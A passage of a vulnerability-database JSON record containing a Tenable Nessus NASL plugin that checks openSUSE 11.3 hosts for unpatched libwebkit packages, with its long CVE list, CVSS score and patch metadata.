"CVE-2010-1813", "CVE-2009-1698", "CVE-2010-0052", "CVE-2010-0315", "CVE-2010-1412", "CVE-2010-3808", "CVE-2009-1691", "CVE-2010-3810", "CVE-2010-1397", "CVE-2009-2419", "CVE-2010-1416", "CVE-2010-1396", "CVE-2010-1417", "CVE-2010-3257", "CVE-2010-1823", "CVE-2010-1789", "CVE-2009-2199", "CVE-2010-1757", "CVE-2010-1409", "CVE-2009-1712", "CVE-2010-0046", "CVE-2010-0651", "CVE-2010-1760", "CVE-2010-0054", "CVE-2010-3809", "CVE-2010-1783", "CVE-2010-3900", "CVE-2009-2200", "CVE-2009-2841", "CVE-2010-3812", "CVE-2009-1695", "CVE-2010-2301", "CVE-2010-3816", "CVE-2009-1718", "CVE-2010-2300", "CVE-2009-1685", "CVE-2010-1749", "CVE-2010-1758", "CVE-2010-1787", "CVE-2010-1771", "CVE-2009-2797", "CVE-2010-1410", "CVE-2010-1807", "CVE-2010-3116", "CVE-2010-0048", "CVE-2010-1415", "CVE-2010-1769", "CVE-2010-3312", "CVE-2010-3818", "CVE-2009-1709", "CVE-2010-1419", "CVE-2010-1407", "CVE-2010-2297", "CVE-2010-1780", "CVE-2010-1766", "CVE-2010-1772", "CVE-2010-3817", "CVE-2010-1389", "CVE-2010-1391", "CVE-2009-1700", "CVE-2009-1684", "CVE-2010-3803", "CVE-2010-1763", "CVE-2009-1725", "CVE-2010-1387", "CVE-2010-3829", "CVE-2010-3824", "CVE-2010-1126", "CVE-2010-1759", "CVE-2010-3811", "CVE-2009-1696", "CVE-2010-0650", "CVE-2009-1703", "CVE-2010-1388", "CVE-2010-0659", "CVE-2010-1786", "CVE-2010-1773", "CVE-2009-3934", "CVE-2010-1729", "CVE-2010-1785", "CVE-2010-1029", "CVE-2009-1689", "CVE-2010-3820", "CVE-2010-1774", "CVE-2010-1395", "CVE-2010-1400", "CVE-2009-1688", "CVE-2009-0945", "CVE-2010-2264", "CVE-2009-1713", "CVE-2010-1406", "CVE-2010-1418", "CVE-2010-3826", "CVE-2010-2302", "CVE-2010-1398", "CVE-2010-1790", "CVE-2009-1711", "CVE-2009-1692", "CVE-2009-1681", "CVE-2010-1401", "CVE-2010-1788", "CVE-2010-3822", "CVE-2010-1413", "CVE-2010-1781", "CVE-2009-1690", "CVE-2010-3805", "CVE-2010-1815", "CVE-2010-1408", "CVE-2010-1403", "CVE-2010-1404", "CVE-2010-1761", "CVE-2010-1782", "CVE-2010-1814", "CVE-2010-1792", "CVE-2009-1724", "CVE-2010-1422", "CVE-2010-3819", "CVE-2010-1390", "CVE-2010-1767", "CVE-2010-3259", "CVE-2010-1236", "CVE-2010-2441", "CVE-2009-2816", "CVE-2010-0656", "CVE-2009-2195", "CVE-2010-1812", "CVE-2009-3384", "CVE-2009-1687", "CVE-2010-1393", "CVE-2010-1791", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1825", "CVE-2010-0647", "CVE-2009-3933", "CVE-2010-1822", "CVE-2009-1699", "CVE-2010-1784", "CVE-2010-1824", "CVE-2010-1233", "CVE-2009-1701", "CVE-2010-0053", "CVE-2009-1715", "CVE-2010-3804", "CVE-2010-0047", "CVE-2009-1714", "CVE-2010-0051", "CVE-2010-1402", "CVE-2010-4040", "CVE-2010-1762", "CVE-2009-1694", "CVE-2010-0050", "CVE-2009-1702", "CVE-2010-1386", "CVE-2010-3821", "CVE-2009-1710", "CVE-2009-3272", "CVE-2010-3813", "CVE-2009-1686", "CVE-2010-1764", "CVE-2010-1405", "CVE-2010-1414", "CVE-2010-3823", "CVE-2009-1693", "CVE-2010-1421", "CVE-2010-2295", "CVE-2010-1394", "CVE-2010-1399", "CVE-2010-0661", "CVE-2010-1793", "CVE-2009-1697"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libwebkit-lang", "p-cpe:/a:novell:opensuse:libwebkit-devel", "p-cpe:/a:novell:opensuse:libwebkit-1_0-2", "cpe:/o:novell:opensuse:11.3", "p-cpe:/a:novell:opensuse:webkit-jsc", "p-cpe:/a:novell:opensuse:libwebkit-1_0-2-32bit"], "id": "SUSE_11_3_LIBWEBKIT-110104.NASL", "href": "https://www.tenable.com/plugins/nessus/75629", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libwebkit-3787.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75629);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/10/25 13:36:41\");\n\n script_cve_id(\"CVE-2009-0945\", \"CVE-2009-1681\", \"CVE-2009-1684\", \"CVE-2009-1685\", \"CVE-2009-1686\", \"CVE-2009-1687\", \"CVE-2009-1688\", \"CVE-2009-1689\", \"CVE-2009-1690\", \"CVE-2009-1691\", \"CVE-2009-1692\", \"CVE-2009-1693\", \"CVE-2009-1694\", \"CVE-2009-1695\", \"CVE-2009-1696\", \"CVE-2009-1697\", \"CVE-2009-1698\", \"CVE-2009-1699\", \"CVE-2009-1700\", \"CVE-2009-1701\", \"CVE-2009-1702\", \"CVE-2009-1703\", \"CVE-2009-1709\", \"CVE-2009-1710\", \"CVE-2009-1711\", \"CVE-2009-1712\", \"CVE-2009-1713\", \"CVE-2009-1714\", \"CVE-2009-1715\", \"CVE-2009-1718\", \"CVE-2009-1724\", \"CVE-2009-1725\", \"CVE-2009-2195\", \"CVE-2009-2199\", \"CVE-2009-2200\", \"CVE-2009-2419\", \"CVE-2009-2797\", \"CVE-2009-2816\", \"CVE-2009-2841\", \"CVE-2009-3272\", \"CVE-2009-3384\", \"CVE-2009-3933\", \"CVE-2009-3934\", \"CVE-2010-0046\", \"CVE-2010-0047\", \"CVE-2010-0048\", \"CVE-2010-0049\", \"CVE-2010-0050\", \"CVE-2010-0051\", \"CVE-2010-0052\", \"CVE-2010-0053\", \"CVE-2010-0054\", \"CVE-2010-0315\", \"CVE-2010-0647\", \"CVE-2010-0650\", \"CVE-2010-0651\", \"CVE-2010-0656\", \"CVE-2010-0659\", \"CVE-2010-0661\", \"CVE-2010-1029\", \"CVE-2010-1126\", \"CVE-2010-1233\", \"CVE-2010-1236\", \"CVE-2010-1386\", \"CVE-2010-1387\", \"CVE-2010-1388\", \"CVE-2010-1389\", \"CVE-2010-1390\", \"CVE-2010-1391\", \"CVE-2010-1392\", \"CVE-2010-1393\", \"CVE-2010-1394\", \"CVE-2010-1395\", \"CVE-2010-1396\", \"CVE-2010-1397\", \"CVE-2010-1398\", \"CVE-2010-1399\", \"CVE-2010-1400\", \"CVE-2010-1401\", \"CVE-2010-1402\", \"CVE-2010-1403\", \"CVE-2010-1404\", \"CVE-2010-1405\", \"CVE-2010-1406\", \"CVE-2010-1407\", \"CVE-2010-1408\", \"CVE-2010-1409\", \"CVE-2010-1410\", \"CVE-2010-1412\", \"CVE-2010-1413\", \"CVE-2010-1414\", \"CVE-2010-1415\", \"CVE-2010-1416\", \"CVE-2010-1417\", \"CVE-2010-1418\", \"CVE-2010-1419\", \"CVE-2010-1421\", \"CVE-2010-1422\", \"CVE-2010-1729\", \"CVE-2010-1749\", \"CVE-2010-1757\", \"CVE-2010-1758\", \"CVE-2010-1759\", \"CVE-2010-1760\", \"CVE-2010-1761\", \"CVE-2010-1762\", \"CVE-2010-1763\", \"CVE-2010-1764\", \"CVE-2010-1766\", \"CVE-2010-1767\", \"CVE-2010-1769\", \"CVE-2010-1770\", \"CVE-2010-1771\", \"CVE-2010-1772\", \"CVE-2010-1773\", \"CVE-2010-1774\", \"CVE-2010-1780\", \"CVE-2010-1781\", \"CVE-2010-1782\", \"CVE-2010-1783\", \"CVE-2010-1784\", \"CVE-2010-1785\", \"CVE-2010-1786\", \"CVE-2010-1787\", \"CVE-2010-1788\", \"CVE-2010-1789\", \"CVE-2010-1790\", \"CVE-2010-1791\", \"CVE-2010-1792\", \"CVE-2010-1793\", \"CVE-2010-1807\", \"CVE-2010-1812\", \"CVE-2010-1813\", \"CVE-2010-1814\", \"CVE-2010-1815\", \"CVE-2010-1822\", \"CVE-2010-1823\", \"CVE-2010-1824\", \"CVE-2010-1825\", \"CVE-2010-2264\", \"CVE-2010-2295\", \"CVE-2010-2297\", \"CVE-2010-2300\", \"CVE-2010-2301\", \"CVE-2010-2302\", \"CVE-2010-2441\", \"CVE-2010-3116\", \"CVE-2010-3257\", \"CVE-2010-3259\", \"CVE-2010-3312\", \"CVE-2010-3803\", \"CVE-2010-3804\", \"CVE-2010-3805\", \"CVE-2010-3808\", \"CVE-2010-3809\", \"CVE-2010-3810\", \"CVE-2010-3811\", \"CVE-2010-3812\", \"CVE-2010-3813\", \"CVE-2010-3816\", \"CVE-2010-3817\", \"CVE-2010-3818\", \"CVE-2010-3819\", \"CVE-2010-3820\", \"CVE-2010-3821\", \"CVE-2010-3822\", \"CVE-2010-3823\", \"CVE-2010-3824\", \"CVE-2010-3826\", \"CVE-2010-3829\", \"CVE-2010-3900\");\n\n script_name(english:\"openSUSE Security Update : libwebkit (openSUSE-SU-2011:0024-1)\");\n script_summary(english:\"Check for the libwebkit-3787 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Various bugs in webkit have been fixed. The CVE id's are :\n\nCVE-2009-0945, CVE-2009-1681, CVE-2009-1684, CVE-2009-1685,\nCVE-2009-1686, CVE-2009-1687, CVE-2009-1688, CVE-2009-1689,\nCVE-2009-1691, CVE-2009-1690, CVE-2009-1692, CVE-2009-1693,\nCVE-2009-1694, CVE-2009-1695, CVE-2009-1696, CVE-2009-1697,\nCVE-2009-1698, CVE-2009-1699, CVE-2009-1700, CVE-2009-1701,\nCVE-2009-1702, CVE-2009-1703, CVE-2009-1709, CVE-2009-1710,\nCVE-2009-1711, CVE-2009-1712, CVE-2009-1713, CVE-2009-1714,\nCVE-2009-1715, CVE-2009-1718, CVE-2009-1724, CVE-2009-1725,\nCVE-2009-2195, CVE-2009-2199, CVE-2009-2200, CVE-2009-2419,\nCVE-2009-2797, CVE-2009-2816, CVE-2009-2841, CVE-2009-3272,\nCVE-2009-3384, CVE-2009-3933, CVE-2009-3934, CVE-2010-0046,\nCVE-2010-0047, CVE-2010-0048, CVE-2010-0049, CVE-2010-0050,\nCVE-2010-0052, CVE-2010-0053, CVE-2010-0054, CVE-2010-0315,\nCVE-2010-0647, CVE-2010-0051, CVE-2010-0650, CVE-2010-0651,\nCVE-2010-0656, CVE-2010-0659, CVE-2010-0661, CVE-2010-1029,\nCVE-2010-1126, CVE-2010-1233, CVE-2010-1236, CVE-2010-1386,\nCVE-2010-1387, CVE-2010-1388, CVE-2010-1389, CVE-2010-1390,\nCVE-2010-1391, CVE-2010-1392, CVE-2010-1393, CVE-2010-1394,\nCVE-2010-1395, CVE-2010-1396, CVE-2010-1397, CVE-2010-1398,\nCVE-2010-1399, CVE-2010-1400, CVE-2010-1401, CVE-2010-1402,\nCVE-2010-1403, CVE-2010-1404, CVE-2010-1405, CVE-2010-1406,\nCVE-2010-1407, CVE-2010-1408, CVE-2010-1409, CVE-2010-1410,\nCVE-2010-1412, CVE-2010-1413, CVE-2010-1414, CVE-2010-1415,\nCVE-2010-1416, CVE-2010-1417, CVE-2010-1418, CVE-2010-1419,\nCVE-2010-1421, CVE-2010-1422, CVE-2010-1729, CVE-2010-1749,\nCVE-2010-1757, CVE-2010-1758, CVE-2010-1759, CVE-2010-1760,\nCVE-2010-1761, CVE-2010-1762, CVE-2010-1763, CVE-2010-1764,\nCVE-2010-1766, CVE-2010-1767, CVE-2010-1769, CVE-2010-1770,\nCVE-2010-1771, CVE-2010-1772, CVE-2010-1773, CVE-2010-1774,\nCVE-2010-1780, CVE-2010-1781, CVE-2010-1782, CVE-2010-1783,\nCVE-2010-1784, CVE-2010-1785, CVE-2010-1786, CVE-2010-1787,\nCVE-2010-1788, CVE-2010-1789, CVE-2010-1790, CVE-2010-1791,\nCVE-2010-1792, CVE-2010-1793, CVE-2010-1807, CVE-2010-1812,\nCVE-2010-1813, CVE-2010-1814, CVE-2010-1815, CVE-2010-1822,\nCVE-2010-1823, CVE-2010-1824, CVE-2010-1825, CVE-2010-2264,\nCVE-2010-2295, CVE-2010-2297, CVE-2010-2300, CVE-2010-2301,\nCVE-2010-2302, CVE-2010-2441, CVE-2010-3116, CVE-2010-3257,\nCVE-2010-3259, CVE-2010-3312, CVE-2010-3803, CVE-2010-3804,\nCVE-2010-3805, CVE-2010-3808, CVE-2010-3809, CVE-2010-3810,\nCVE-2010-3811, CVE-2010-3812, CVE-2010-3813, CVE-2010-3816,\nCVE-2010-3817, CVE-2010-3818, CVE-2010-3819, CVE-2010-3820,\nCVE-2010-3821, CVE-2010-3822, CVE-2010-3823, CVE-2010-3824,\nCVE-2010-3826, CVE-2010-3829, CVE-2010-3900, CVE-2010-4040\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=601349\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-01/msg00013.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libwebkit packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 79, 94, 119, 189, 200, 264, 310, 352, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit-1_0-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit-1_0-2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libwebkit-1_0-2-1.2.6-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libwebkit-devel-1.2.6-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libwebkit-lang-1.2.6-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"webkit-jsc-1.2.6-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"libwebkit-1_0-2-32bit-1.2.6-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libwebkit-1_0-2 / libwebkit-1_0-2-32bit / libwebkit-devel / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
